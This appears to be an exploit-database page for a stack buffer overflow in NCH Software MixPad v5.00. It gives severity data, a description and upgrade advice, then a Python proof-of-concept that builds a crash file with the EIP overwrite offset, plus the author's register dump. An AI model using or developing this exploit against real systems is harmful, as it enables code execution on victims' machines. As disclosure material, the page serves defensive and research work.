header-logo
Suggest Exploit
vendor:
MixPad
by:
bzyo
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: MixPad
Affected Version From: v5.00
Affected Version To: v5.00
Patch Exists: YES
Related CWE: N/A
CPE: a:nch_software:mixpad
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows XP
2017

NCH Software MixPad v5.00 – Unicode Buffer Overflow

NCH Software MixPad is vulnerable to a buffer overflow vulnerability when a specially crafted file is opened. This can be exploited to execute arbitrary code by corrupting memory. The vulnerability is caused due to a boundary error when processing a specially crafted file. This can be exploited to cause a stack-based buffer overflow by writing past the end of an allocated fixed-length buffer.

Mitigation:

Upgrade to the latest version of NCH Software MixPad.
Source

Exploit-DB raw data:

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow
# Date: 21-01-2017
# Vulnerable Software: NCH Software MixPad
# Vendor Homepage: http://www.nch.com.au/mixpad
# Version: v5.00
# Software Link: http://www.nch.com.au/mixpad/mpsetup.exe
# Tested On: Windows XP
#
#
# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound' 
#
# no unicode jmp/call to esp
# 
# EAX 00117700
# ECX 001167F0
# EDX 7C90E514 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed."
# EBP 00116FAC
# ESI 0000004E
# EDI 00117740
# EIP 00CC00CC

filename="crash.txt"
 
junk = "A"*251
eip = "\xcc"*2  			#eip over; jmp/call esp goes here
fill = "B"*100				#only 6 used in esp
buffer = junk + eip + fill

  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()